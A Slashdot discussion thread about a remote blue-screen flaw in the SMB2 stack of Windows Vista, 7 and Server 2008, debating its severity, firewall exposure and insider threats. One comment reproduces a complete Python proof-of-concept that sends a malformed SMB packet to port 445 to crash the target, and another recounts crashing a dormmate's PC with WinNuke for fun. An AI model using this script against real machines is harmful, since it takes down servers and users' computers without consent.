Windows 7 Reintroduces Remote BSoD

David Gerard writes "Remember the good old days of the 1990s, when you could teardrop attack any Windows user who'd annoyed you and bluescreen them? Microsoft reintroduces this popular feature in Windows 7, courtesy the rewritten TCP/IP and SMB2 stacks. Well done, guys! Another one for the Windows 7 Drinking Game."

Local?

[MindStalker]

If it relies on a SMB2 request it is most likely restricted form request inside the LAN.
Either way, still bad.

Re:Local?

[fuzzyfuzzyfungus]

Especially unpleasant given that SMB2 is pretty common on important shared resources. Like fileservers.

Crashing clients is bad, any client on the LAN being able to take down the fileserver is substantially worse.

Re:Local?

[afidel]

Actually the headline is very misleading and that's bad. This affects SMB2 which is in Vista and Server 2008 as well, that means every Server 2008 system is likely vulnerable to a LAN based DoS attack.

"RE"-introducing?

[WED Fan]

The article makes it seem like it hasn't been in Windows since Windows NT and that Windows 7 is the first time it's reappeared. Seriously, Vista has it.

Is this a case of "It's after midnight, must post another slam on Microsoft, even if we have twist and stretch like taffy to make the case"?

It wouldn't be so bad but the body of the submission is incredibly slanted, almost more than some of the replies.

Re:"RE"-introducing?

[David Gerard]

Yeah, reading error on my part. Sorry about that. Let's give Vista credit where it's due!

Re:

[node 3]

Yes, it's such an "entirely new operating system" that is has the same bugs.

MS astroturfers are so busy these days. If you put down a bug in Windows 7, responses that say, "hey, don't pick on MS, it was in Vista too!" get upmodded, and then if you say, "well, 7 is an update to Vista", responses rebutting it get upmodded.

Windows kinda sucks. Vista was pretty awful, 7 is better, and is really what Vista *should* have been (and it is completely based on Vista, modding this fact down doesn't make it untrue).

Mac

Re:"RE"-introducing?

[moranar]

So you mean the problem is _less serious_ by the fact that it's been on _more_ Windows versions than stated? Maybe you mean that MS has said 'it's not a problem because this and that?'

Idiot

[omb]

Of course it is _VERY_SERIOUS_, un-priviliged user-land electively crashes kernel of every machine it can route TCP packets to, WTF are you stupid or something?

Re:

[omb]

Userland should __NEVER__ be able to crash the OS, M$ fanbois are the reason Windows is as bad as it is! If this was Linux a patch would be issued in hours. See the deref 0 with page 0 mmaped exploit.

Re:

[daveime]

Why does the file sharing system in Windows rely on the cartoon baddie from Mario games ? Bowser, srsly ?

Re:"RE"-introducing?

[jedidiah]

You make it sound like a gaping security hole is alright just because it's been in the product long enough that people might have forgotten about it.

If anything, this makes it sound like Windows 7 is the same old crap and that once again we have empty promises from Microsoft claiming that they will do things right this time.

Windows users are like domestic abuse victims.

Re:"RE"-introducing?

[David Gerard]

But Macs cost too much, and Linux is too hard. And Microsoft only hits me because he loves me.

Re:

[blind biker]

The article makes it seem like it hasn't been in Windows since Windows NT and that Windows 7 is the first time it's reappeared. Seriously, Vista has it.

Is this a case of "It's after midnight, must post another slam on Microsoft, even if we have twist and stretch like taffy to make the case"?

I'm here, reading your wonderful post, and laughing my ass off! Do you really think, reminding us that this horrible flaw is already present in Windows Vista, will somehow "soften the blow"?

Man, you're precious!

Re:Local?

[GameMaster]

Of course, the proper remedy for this (given that it is on a LAN) is to get up, walk down the hall, and beat the crap out of the douche-bag who's DoSing you. Really, the only reason DoS attacks work so well on the Internet is that the guys doing it are probably half-way around the world.

Re:Local?

[afidel]

What about the employee who just got fired who sets off an IP walk that crashes every file server? What about the employee that gets the malware of the day and it includes the ability for the 0wner to launch this attack inside your LAN? There's a lot more potential for abuse than just the prankster on the helpdesk deciding he wants to create some havoc.

Re:

[sopssa]

For that matter, does this work through software that emulate LAN over internet, like hamachi?

But yeah, just because it works only inside lan, doesn't mean it cant come with some malware or worm.

Re:

[RiotingPacifist]

I can see it being used multiple times to dereference multiple kernel pointers, but i can't see how you would get it execute code. I suppose its a question of how much damage you can do dereferencing stuff inside the kernel vs how much protection the NT has against this stuff.
On linux a few well placed dereferences and you could probably disable the firewall then run anything in effective root (by removing all security checks), ofc to do damage you would still need a second exploit on an already running pro

Re:

[PsychicX]

Agreed -- it IS rather bad, but generally speaking you're not expecting attacks from inside your LAN. As Windows vulnerabilities go, this isn't horrible in a practical sense.

Re:

[ZekoMal]

Not expecting such a problem until you go to college; half of the students on my campus don't even have a password put on their computers, making it extremely easy to access them remotely as is. If everyone had Win 7 installed, well...it'd make for some interesting work.

Re:Local?

[Sethb]

Uh, by default on modern incarnations of Windows, accounts without passwords are *not* allowed to log in remotely. So, they're extremely difficult to access remotely.

Re:

[PC and Sony Fanboy]

... except that 99.99% of students don't have anything worth stealing on their computers.

Other than movies/music/credit card info, of course.

Re:

[Anonymous Coward]

Digital cameras make for plenty of things worth finding.

Re:

[dontclapthrowmoney]

...generally speaking you're not expecting attacks from inside your LAN...

Even if you have total control over all physical access points to your LAN, and total trust in your user base, there is still a chance that internal people can try to do nasty things - and in some ways they may have more motivation to do so.

I think the concept of "internal/trusted network" is going to shrink - nowadays I tend to this of the "internal network" as ending at the edge of centralised server resources, and clients on what would have been called the "internal LAN" are actually outside of wha

Re:

[postbigbang]

There is no such thing as total trust. Bots aren't trustworthy, and there are millions of machines that have them handily installed.

Oops.

Re:

[ShieldW0lf]

Trust in computer disciplines doesn't have anything to do with something being trustworthy. Trust is an expression that you have left yourself vulnerable, and are trusting that you won't be exploited. How you feel about leaving yourself vulnerable is irrelevant. The probability that you will be exploited is also irrelevant.

That's what Trusted Computing is all about... it's not that your computer is more secure... it's that your computer is less secure, and you are trusting third parties not to screw you

Re:Local?

[phoenix321]

Second that big time.

The belief that a cloud of several thousand clients can ever be held secure is almost obscene. IT departments that concentrate most heavily on defending the outer border of their network, placing more than only a slight hint of trust in their "owned" client hardware are hopefully becoming rare.

Several thousand notebooks, travelling along the employees all around the world, through a hundred massive wifi-zones, hotel LANs, airports etc., should not be trusted higher than the machine Joe Random Employee brought from home. The official corporate notebook may have all the branding, settings, applications and whatnot, but that can at best make it a decently hardened PC, not bullet proof.

Many organisations really concentrate on the border, falling to the illusion of control: "we control the machine, the user / employee has no admin rights so all machines that go along on a business trip come back in perfect shape and without ever acquiring a drive-by rootkit somwhere"

In reality, most breaches are done, or facilitated, or unknowingly supported by people inside the organisation. Disgruntled employees are surely the worst enemy - and guaranteed to be numerous in any multinational company under the current economy. But it can also be frequent-fliers, hard-working staff that take their laptops everywhere and try to work all the time, connecting to a hundred different wifi-APs per year. Trusting a machine means physical control over everything. Trusting machines that commute and travel daily along with their employees is batshit crazy - but most IT departments still pretend they don't see that.

Re:

[asdf7890]

On its own is isn't massively scary, but if the exploit can be triggered by a non-privileged user then it could be used in conjunction with many other types of attack to create a DoS. If someone (or some automated malicious code) exploits a hole in your public facing mail/web/what-ever server to gain access to run arbitrary code then they could DoS any machines not shielded from the hacked machine (which may only be that machine itself, but that is still one machine that can be taken offline). There is als

Re:Local?

[GameMaster]

NOBODY EXPECT ATTACKS FROM INSIDE YOUR LAN!!!! Their chief weapon is surprise...surprise and fear...fear and surprise.... Their two weapons are fear and surprise...and ruthless efficiency.... Their *three* weapons are fear, surprise, and ruthless efficiency...and an almost fanatical devotion to rms.... Their *four*...no... *Amongst* their weapons.... Amongst their weaponry...are such elements as fear, surprise.... I'll come in again.

Re:

[Idaho]

generally speaking you're not expecting attacks from inside your LAN. As Windows vulnerabilities go, this isn't horrible in a practical sense.

Really? That may be true in small(ish) companies, say less than 50 employees. In general, many security experts beg to differ [usfst.com], however.

Some select quotes:

"In 92 percent of the incidents [re. inside attacks] investigated, revenge was the primary motivator."

Common attacks:

Manipulation of Protocol Design Flaws: Protocol weaknesses in TCP/IP can result in a virtual treasu

Re:

[bbernard]

"but generally speaking you're not expecting attacks from inside your LAN"

Right, because a virus on my local network would never take advantage of that.
Right, because more than 60% of data loss events are triggered by insiders.
Right, because you personally know and trust every user on your LAN.
Right, because nobody would connect an unapproved device, like their iPod, or personal PC, to the LAN.

If you're not expecting most of your attacks from inside your LAN then you're just fooling yourself.

Re:Local?

[gazbo]

Just because IPv6 reduces the need for NAT doesn't mean you shouldn't use a firewall. I assume that's what you were talking about anyway.

Re:

[Midnight Thunder]

If it works with IPv6 then a malicious site can have IPv6 address. When the user visits the site the code reads the source IP and implements the attack.

This is why in a properly configured network you can limit SMB to within your network, by use of a firewall. With IPv6 a firewall is pretty much mandatory. If you need to file share outside your network, then using something like webdav in HTTPS mode is probably better, since this helps make it clear that you are not within your network.

Actually thinking abo

Re:

[jim_v2000]

Pft...it'll be patched whenever the next update cycle is and will be irrelevant. Yeah, it's bad, but it will be short lived.

Re:Local?

[poetmatt]

well, now I know how to win any lan party contests :)

The difference is...

[Xest]

...half the world is behind a NAT setup now, and the other half has Windows firewall enabled. Windows update exists now so people will be able to patch quickly and easily when a patch arrives.

Realistically this isn't going to effect many people like the old exploit did.

Still, it's quite comical, maybe this is Microsoft's take on the saying "The old ones are the best". So much for their secure development practices, there's really no excuse for them not picking this one up before release.

Re:The difference is...

[rastilin]

Rewritten software is a double-edged sword. On the one hand you are able to finally discard the truly broken sections of your previous implementation; allowing you to make massive leaps forward. On the other you're getting rid of a large list of known bugs and replacing it with an even larger list of unknown ones.

One of the most useful features of old technolgy is that it breaks in predictable ways.

So it's not too surprising that something like this happened. Doesn't worry me either, I have firewalls and a NAT on all my machines, no reason not to. However since it's something that happened before, it's irritating that Microsoft didn't think to check for something like this.

Re:

[RebelWebmaster]

One would hope that they'd have a suite of unit tests that would catch something like this, though.

Re:The difference is...

[Sfing_ter]

really - unless the person sets the "Let Microsoft decide when and where I do updates" most of the updates WILL NOT be done. The average person uses the computer like a tv - turn it on to see the web and turn it off when done. Leave my computer on ALL NIGHT just so i can backup/run antivirus/run defrag/run etc. etc. ???

Oh yeah these people do exist and they have 'FRIENDS' that 'KNOW' computers and 'HELP' them out by turning off that annoying UAC or giving them a 'FREE' version of office. The looks on their faces when I explain that the software they got off Limewire is infected with virus' - they can't believe microsoft would do that!!! THAT is the mentality, and that is why these attacks have always worked, and will always work.

Re:

[not already in use]

The average person uses the computer like a tv - turn it on to see the web and turn it off when done.

First step to writing a clandestine flame post: Imply "facts." People will just assume they're true, when in reality, they are not.

Oh yeah these people do exist and they have 'FRIENDS' that 'KNOW' computers and 'HELP' them out by turning off that annoying UAC or giving them a 'FREE' version of office. The looks on their faces when I explain that the software they got off Limewire is infected with virus' - they can't believe microsoft would do that!!! THAT is the mentality, and that is why these attacks have always worked, and will always work.

Step two involves strategically placing words in all caps and building straw men to attack.

It amazes me these days for what passes as informative on slashdot.

Not a problem.

[onion2k]

It's incredibly unlikely to ever affect anyo

Re:

[account_deleted]

Comment removed based on user account deletion

I knew Windows 7 was too good to be true

[commodore64_love]

- Shiny-new interface.
- No annoying "are you sure" popups every 30 seconds like Vista.
- Can run on a 1 gigabyte machine without slowing to a crawl.

It simply wasn't possible for Microsoft to make such a great perfect OS without including a flaw.

Re:

[Dr_Barnowl]

Supposedly, attempting to create something perfect would be an affront to Allah, who is the only being who is perfect and who can create perfection.

Then surely the deliberate introduction of such flaws is the height of arrogance? They are assuming that they could have attained perfection, whereas even a rug that would be perfect to the human eye, is obviously little better than a puke-stained rag in the sight of Allah. He is truly merciful not to smite them most smite-ily for their presumption that they could even comprehend the nature of rug-perfection, let alone attain it!

Re:

[Abreu]

I'll bite.

Theologically speaking, it's not to avoid "Allah feeling threatened and insecure".

The rug maker is just insuring himself that he won't fall to pride and hubris.

Not consistent

[james_a_craig]

Having actually tried this on three windows 7 machines now, it doesn't seem to work on every machine. (Actually, it's yet to work on any here, although I hear tell that it does work on some). There's something more to this than just "that data crashes it every time".

Re:Not consistent

[DoofusOfDeath]

Having actually tried this on three windows 7 machines now, ...

You must be popular with your coworkers.

Re:Not consistent

[Lulfas]

It's because SMB and SMBv2 are firewalled straight out of the box. You have to turn on homegroup and then attempt to exploit. Not quite the "OMG SKY IS FALLING" that the summary leads us to believe.

Re:Not consistent

[afidel]

Try it against a Server 2008 lab server with file shares, I'll bet that it will BSOD.

Correction!

[David Gerard]

I was terribly unfair to Microsoft in the story summary (which is pretty much what I wrote) - per TFA, this flaw is actually an exciting new feature of Vista, not of Windows 7.

And before anyone says "but Win7 is beta!" - this flaw is present in the gold master.

Re:Correction!

[Anonymous Coward]

And not exploitable out of the box since SMB and SMBv2 are both firewalled. Yes, if you turn on homegroup, you are opening SMBv2 through the firewall, but only for the private network - so the exploit would need to be coming from another machine at your house. All in all, a nasty issue but won't really affect that many people.

SMB is firewalled ?

[viralMeme]

"And not exploitable out of the box since SMB and SMBv2 are both firewalled"

What do you mean, is this firewall the software one built into Vista or an external one. If so thn it's relying on the same TCP/IP stack to protect it.

Re:

[RalphSleigh]

My understanding is this a protocol based, rather than TCP attack (the proof uses a normal python socket to send some data), so if the firewall eats the packet instead of letting the SMB service get it, the PC will be fine.

Re:

[VGPowerlord]

"And not exploitable out of the box since SMB and SMBv2 are both firewalled"

What do you mean, is this firewall the software one built into Vista or an external one. If so thn it's relying on the same TCP/IP stack to protect it.

Yes, but SMB2 is a higher level protocol than TCP or IP. In network stacks, received packets are processed from the bottom up.

In OSI terms, received packets are processed like this: physical, data link, network, transport, session, presentation, application. TCP and IP live at the m

Ahh, nice to see ...

[UncHellMatt]

...that my fellow Boston Public School graduates are writing for seclists.org.

Section V: "An attacker can remotly crash without no user interaction, any Vista/Windows 7 machine with SMB enable. "

Yes, because we been done had seen that explot in the pasts.

Dear $DEITY, are there no proof readers or editors alive on these sites?

Re:

[gclef]

It's the full-disclosure mailing list....be happy it's not in leet.

I'll be suprised if this affects anyone.

[jim_v2000]

IT departments are going to keep everything patched, and individuals aren't going to do it to themselves on their LANS. Between firewalls and NATs, it's not going to happen over the internet. Really, the only situation that I can imagine this happening is perhaps on a university network.

Re:

[jgtg32a]

Or maybe they won't patch this and use it to punish annoying users

Re:

[account_deleted]

Comment removed based on user account deletion

Re:

[Krneki]

The same as using WAN/LAN connection without a firewall.

Happy BSOD day. :)

Re:

[rabbit994]

When Windows 7 pops up and asks you what type of network is this and you say "Public", guess what gets firewalled off? I've tried this on my Windows 7 lab computers. If you mark the network as public or disabled file sharing (which is default), Windows firewall will stop this one cold. While this is pretty big "oops", in the real world, it's pretty minor and should be patched before "unwashed masses" get ahold of Windows 7.

Question I have, was Microsoft notified about the problem before this disclosure or w

Re:

[Krneki]

Of course, impossible scenario.

Infect one PC inside the network and let the new virus BSOD everything inside the LAN.

Re:

[jim_v2000]

"Infect one PC inside the network and let the new virus BSOD everything inside the LAN."

Yeah, assuming that a majority of people on the network have disabled Windows Update.

Re:

[Rich0]

Yup - this could never impact anybody.

Why, the ports used to trigger this exploit are like the DCOM RPC ports and MS-SQL ports - nobody allows those to be accessed over the internet which is why we've never had any large-scale worms take advantage of them...

Re:

[jim_v2000]

When was the last time that you saw a large-scale worm attack?

(I'm actually curious because I can't remember. Seems like it's been years.)

Please grow up, you're driving us away

[Anonymous Coward]

Hi. I'm an adult. I work as a software engineer.

I cannot join in with the Linux community because of you people. You're just *too awful*. Instead of accepting that this stuff happens and it's bad, you childishly nerdsnort and start writing Microsoft with a dollar sign instead of an S, acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs. Get the fuck over it.

I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.

If you want to attract intelligent, grown-up people to Linux you need to stop doing certain things.

1) Don't act as if users of other operating systems are less intelligent than you. It turns out that Linux-advocacy isn't the entire world, and that leaders in different fields (or even this one!) might be using Windows. They're not "lusers", they just have priorities different from your own.

2) Don't act as if Linux hasn't had equally stupid stuff happen to it. Yes, it's a different process altogether, and I would dare say that bugs are less likely due to its open source nature, but they still happen. One that I can remember off the top of my head is Debian's guessable SSL keys.

3) Try—for ten minutes—to give the impression that half of your time isn't devoted to bashing an OS you believe is irrelevant.

4) For good measure try cutting out the xkcd worship and meme-spouting. We might be able to relate to you people if you acted as if you weren't cut from the same distasteful mold.

Re:Please grow up, you're driving us away

[Anonymous Coward]

The pubertal masses of Slashdot != The Linux community

Re:

[nschubach]

Precisely, that's like saying that the Orthodox Church fully represents all religions.

Re:

[Anonymous Coward]

The pubertal masses of Slashdot != The Linux community

No shit, but you guys certainly align yourselves with it and give it a shitty image. All it takes is one person in a club of a hundred to tarnish the clubs image or one incident to fuck up an image. What was that joke about the old constructor? "I built the old church up on the east hill. I built the schoolhouse over on the outside of the city! I built fives houses for the poor with my own hands! They could've called me Billy the builder! The constructor! But no... ya fuck one goat..."

Re:

[Mornedhel]

Hi. I'm an adult. I work as a software engineer.

[cut a lot of things I happen to agree with]

4) For good measure try cutting out the xkcd worship and meme-spouting. We might be able to relate to you people if you acted as if you weren't cut from the same distasteful mold.

I agree that old memes just copypasted onto anything can be tiring. But half the fun in reading Slashdot is seeing Slashdot memes cleverly reinvented (a Russian reversal is still funny if it applies). I don't want to see the memes go away.

Also, with my current threshold settings, I can see only one meme (of the "$%*ÂNO CARRIER" kind) and no stupid bashing or "Microsh*t". You may be overreacting.

Re:

[bflong]

You're in the wrong place. You won't find a high percentage of adult, intelligent people here, and those that are are not very vocal. Maybe a long, long time ago, but no more. As someone else already said Slashdot != Linux Community.

Re:

[Anonymous Coward]

Yes, use Windows because none of that ever happens. [electronista.com]

Great strawman argument, btw. We should ignore vulnerabilities in microsoft software because some precious flowers don't want their sensibilities offended.

Re:Please grow up, you're driving us away

[Krneki]

Trolls are OS independent. :)

Re:

[JasterBobaMereel]

Slashdot is not the Linux Community

1) People who use windows are not stupid, they either like it, prefer it, are unaware of alternatives, or are forced to .... people who constant claim it is the most wonderful thing and flawless however consider stupid .... just like mindless Linux advocates

2) Yes this has happened in Linux, but as you pointed out Windows is a mainstream commercial product and has, I assume, a whole department paid to do regression testing, checking for likely flaws, checking and rechecki

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:

[shutdown -p now]

I'm sorry, Sir. This is not the Linux community, this is the Slashdot community.

If you want the Linux community, go to http://www.kernel.org/ [kernel.org]

http://kernel.org/ [kernel.org] (specifically, LKML) would be the Linux developer community. Linux community as a whole is a very big thing, but Slashdot is definitely a part of it. Not saying that every single person here is a Linux advocate, but they are certainly in majority.

Re:

[alexhs]

Could the mods please mod the AC parent back to (-1, Troll) ?

It's a strawman.

I could also make generalisations about the "Windows community" being only a bunch of chills, or the "Mac community" being only a bunch of fanboys, and even find plenty of exemples in diverse forums to support my point.

That wouldn't make my comment insightful.

Re:

[natehoy]

Hi, I'm also an adult, and I also work as a software engineer.

>>I cannot join in with the Linux community because of you people.

So to keep you from joining a community, all I need to do is act poorly and pretend to be a member of that community? Wow, there can't be a lot of communities that meet that standard of purity. There are asshats in pretty much every community or movement.

A great number of Linux users, and even contributors, also use Windows, and use both as a tool appropriate to the job at

Oversimplifying the 'community'.

[Junta]

Out of any sufficiently large community, some will engage in the sort of things you describe, or similar or complementary things. Corporate marketing campaigns are largely relying upon evoking those sentiments in the people they target (irrational 'we're #1' mentality without substantial real justification).

1) The chances of making every last Linux user refrain from that are about as likely as having every last Windows user refrain from considering every last willing Linux user an elitist snob who engages

Re:

[slim]

I'm also an adult software engineer.

But I've used Linux and AIX for the last 12 years, and believe me, from my perspective, MS fanboys are guilty of all the same stuff you're seeing in Linux fanboys.

Re:

[should_be_linear]

I cannot join in with the Linux community because of you people.

Live with it, as long as there is constant flow of bullshit from one side, there will be also from the other. Especially in case like this, I mean only yesterday BestBuy employees learned about great security Windows has, comparing to Linux, and now this...

Re:

[ajlisows]

I cannot join in with the Linux community because of you people. You're just *too awful*.Instead of accepting that this stuff happens and it's bad, you childishly nerdsnort and start writing Microsoft with a dollar sign instead of an S, acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs. Get the fuck over it.

I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.

I do agree with a lot of things that you said, except for the main point. If you are truly the mature adult here you should be able to use the best tool for the job even if others who use it act like complete idiots. Most of the people you speak of aren't the ones doing hard core Linux development. There are some very brilliant, mature, and overall decent individuals in the Open Source Community. Heck if you really want to help, bring your Software Engineering skills and your open mindedness to the com

For all who want a more technical summary of TFA:

[Seth Kriticos]

Vulnerable systems are all with SMB2 drivers: Vista, W7 and probably Server 2008

The exploit (which is actually ridiculously simple) goes as follows:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Current problem solution: disable the SMB protocol on your infrastructure..

Now please excuse me, I have go and play a bit with our network admin.. /joke

Samba and SMB2

[Zombie Ryushu]

Let us hope Samba does not replicate this with its SMB2 Server.

I've got karma to burn

[mcmonkey]

Speaking of going back to the '90s...

Why is /. using frames?

Oh, I'm sure on the back end it's some web 2.0 dynamic XCSS crap, but on the front end, it looks like a frame, it walks like a frame, it quacks like a frame.

It's a frame.

In firefox 3, I go to slashdot.org. Then I click a link to the IT section. Browser address bar still reads "slashdot.org" (no IT.)

I click a story link, then click the back button.

The browser goes back to slashdot.org, not it.slashdot.org.

Seriously, WTF?

Not bad eh? Are you kidding me?

[weave]

So I'm reading a lot about this is no big deal because most places have it firewalled off, or most people are behind NAT, etc, etc...

OK, well, tell that to a place like a college that has 50,000 student accounts who all need access to file servers to get their files. You can't just turn off file sharing or block them on the firewall. All it takes is for one 1337 user to show off his mighty hacker skillz by BSOD'ing the servers to ruin things.

At least where I work we are still at 2003 Server -- thankful

Call me an asshole

[DaMattster]

But I have fond memories of the exploit called Win Nuke to cause the BSOD. Back in the day, I was a freshman in college and a football player on our floor was continuously giving me a hard time. In those days, we telnetted into the DEC Alpha to check our email. Also, in those days our IPs were statically assigned and we had no firewall. Those were quite obviously better, more trusting days of the internet. Anyhow, one day I waited until I knew he was in his room and checking email from his computer. I used finger on UNIX to get his IP address. Then, nuke away! I could here him banging, cussing, and throwing his stuff around. So, whenever I needed a little fun, I simply delivered that little exploit. One day he came back from a drunken binge and went to check his email and I felt it was a perfect time to test his patience level. After carefully delivering the little packet, I heard a smashing sound. My guess is he decided to do a body slam, WWF style, on his PC. As I walked by I casually asked what happened as I saw the computer smashed to smithereens. He told me to, "Get outta here, shit nugget!" It was all I could do to keep from bursting out laughing. Moral: Leave the IT guy alone.

Re:Big wow

[mdm-adph]

Yeah, we read the first three lines of the Wikipedia link, too.

Re:

[Anonymous Coward]

No we didn't. Shut up.

Re:

[David Gerard]

This is in the RTM gold master.

Re:

[account_deleted]

Comment removed based on user account deletion

Re:

[commodore64_love]

"Commodore Amiga is better!"
"No Atari ST is better!"
"No Amiga!"
"No Atari!"
"Amiga!"
"Atari!"

Oh that's not the debate you were looking for? Sorry. Let me update that ancient debate for the modern world:
"Apple Macintosh is better!"
"No Microsoft PC is better!"
"No Apple!"
"No Microsoft!"
"Apple!"
"Microsoft!"

(and ancient debate... just as juvenile today as it was 20 years ago)

Re:First Post

[Rik Sweeney]

Let me Loony Tunes that up for you:

Wabbit Season!
Duck Season!

Wabbit Season!
Duck Season!

Re:

[Anonymous Coward]

Or to be more apt (for slashdot)... some people prefer Ford, some prefer Dodge, others still prefer Toyota. Gas is better for some applications, while Diesel is better for others, while electric is better for others.

When a new car line comes out, new defects are to be expected on occasion. Sometimes there are even defects present that were fixed in previous models.

Re:

[account_deleted]

Comment removed based on user account deletion

IP Reasons for SMB2

[eldavojohn]

they don't like introducing "new" things

A slight correction, they like to introduce new things when it suits them. Why the rewrite of SMB into SMB2? Well, it has some technological advantages you would expect but according to Wikipedia [wikipedia.org]:

SMB 2 has two big benefits to Microsoft. The first is clear intellectual property ownership. SMB 1 was originally designed by IBM and was shipped on a wide variety of non-Windows operating systems such as SCO Xenix, OS/2 and DEC VMS (Pathworks). It was partially standardised by X/Open and also had draft standards for IETF which lapsed. (See http://ubiqx.org/cifs/Intro.html [ubiqx.org] for historical detail).

The second benefit is a clean break. Microsoft's SMB1 code has to work with a huge variety of SMB clients and servers. A large number of items in the protocol are optional (such as short and long filenames), there are many infolevels for commands (selecting what structure is returned to a particular request), Unicode was a later addition etc. With SMB2 there is significantly reduced compatibility testing (currently only other Windows Vista clients and servers). Additionally the code is a lot less complex since there is far less variability (e.g. there is no need to worry about having Unicode and non-Unicode code paths as SMB2 requires Unicode support).

So you can see they like to introduce new things when it means they have clear intellectual property ownership rights over it and also a lot less work for them. They also don't have to be backwards compatible with their own products.

While SAMBA 4.0 has experimental support for SMB2 interfacing [samba.org], I'm guessing the "clear intellectual property" could spell trouble moving forward for Tridgell and the SAMBA team.

Re:

[AndrewNeo]

No, it won't. The specs are right here [microsoft.com].

Re:

[leromarinvit]

Probably not technical problems, but maybe legal ones. See that paragraph about patents? Neither the Open Specification Promis nor the Community Promise (both linked) cover SMB2.

Re:IP Reasons for SMB2

[eldavojohn]

No, it won't. The specs are right here [microsoft.com].

"No, it won't" what? Possibly spell problems for the Samba team? From your link:

Patents. Microsoft has patents that may cover your implementations of the technologies described in the Open Specifications. Neither this notice nor Microsoft's delivery of the documentation grants any licenses under those or any other Microsoft patents. However, a given Open Specification may be covered by Microsoft's Open Specification Promise (available here: http://www.microsoft.com/interop/osp [microsoft.com]) or the Community Promise (available here: http://www.microsoft.com/interop/cp/default.mspx [microsoft.com]). If you would prefer a written license, or if the technologies described in the Open Specifications are not covered by the Open Specifications Promise or Community Promise, as applicable, patent licenses are available by contacting iplg@microsoft.com ...

Emphasis mine. So I'll correct myself, it may spell trouble for the Samba team. It's not clear. Which is essentially what I said. Do you really think iplg@microsoft.com will grant the Samba team a written license or possibly a patent license?

Why do they use the ambiguous language quoted above if this is an open technology I'm not suppose to fear implementing? I mean, haven't we been threatened over this sort of thing before [slashdot.org]? It's not clear to me why Microsoft stops other products from interfacing with theirs (product lock in?) but I'm not about to give them the benefit of the doubt.

Re:

[BassMan449]

Did you read the link?

Patents. Microsoft has patents that may cover your implementations of the technologies described in the Open Specifications. Neither this notice nor Microsoft's delivery of the documentation grants any licenses under those or any other Microsoft patents. However, a given Open Specification may be covered by Microsoft's Open Specification Promise (available here: http://www.microsoft.com/interop/osp [microsoft.com] ) or the Community Promise (available here: http://www.microsoft.com/interop/cp/default.mspx [microsoft.com] ). If you would prefer a written license, or if the technologies described in the Open Specifications are not covered by the Open Specifications Promise or Community Promise, as applicable, patent licenses are available by contacting iplg@microsoft.com..

I checked both the Open Specification Promise and the Community Promise and SMB2 is not covered by either. Just because Microsoft published the spec doesn't mean they won't sue you for patent infringment.

Re:

[Sethb]

I love it when Slashdot can't post an accurate headline. This is a flaw in SMB 2.0, which is present in Windows Vista, Windows Server 2008, Windows 7, and probably Windows Server 2008 R2 as well. This is not new to 7, it's a common flaw in all the implementations of SMB 2.0. XP isn't affected because XP can't speak that protocol.